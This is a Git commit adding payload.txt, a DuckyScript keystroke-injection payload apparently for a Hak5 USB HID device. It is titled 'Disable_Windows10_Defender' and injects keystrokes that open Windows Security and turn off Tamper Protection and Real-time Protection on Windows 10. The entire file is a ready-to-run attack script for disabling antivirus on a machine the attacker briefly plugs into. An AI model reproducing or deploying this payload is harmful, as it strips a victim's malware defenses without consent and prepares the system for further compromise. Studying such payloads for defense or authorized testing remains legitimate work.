Create payload.txt

pull/15/head
Zero-Sploit 2021-08-17 05:45:26 -04:00 committed by GitHub
parent 01de78b311
commit 511d745294
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 52 additions and 0 deletions

View File

@ -0,0 +1,52 @@
REM Title: Disable_Windows10_Defender
REM Description Disable Windows Defender and Tamper protection on Windows 10
REM Author: Zero_Sploit
REM Props: Hak5 Team
REM Version: 1.0
REM Target: Windows 10
REM Attackmodes: HID
DELAY 1000
REM Open Windows Defender Settings
CTRL ESC
DELAY 1000
STRING windows security
DELAY 500
ENTER
DELAY 500
ENTER
REM Navigate to Manage Settings then turn off Tamper Protection && Realtime Protection
DOWN
DOWN
DOWN
DOWN
ENTER
DELAY 500
TAB
TAB
TAB
TAB
DELAY 500
SHIFT SPACE
DELAY 1000
ALT y
DELAY 500
ALT F4
DELAY 1000
CTRL ESC
DELAY 1000
STRING windows security
DELAY 500
ENTER
DELAY 500
ENTER
DOWN
DOWN
DOWN
DOWN
ENTER
DELAY 500
SHIFT SPACE
DELAY 500
ALT y
DELAY 500
ALT F4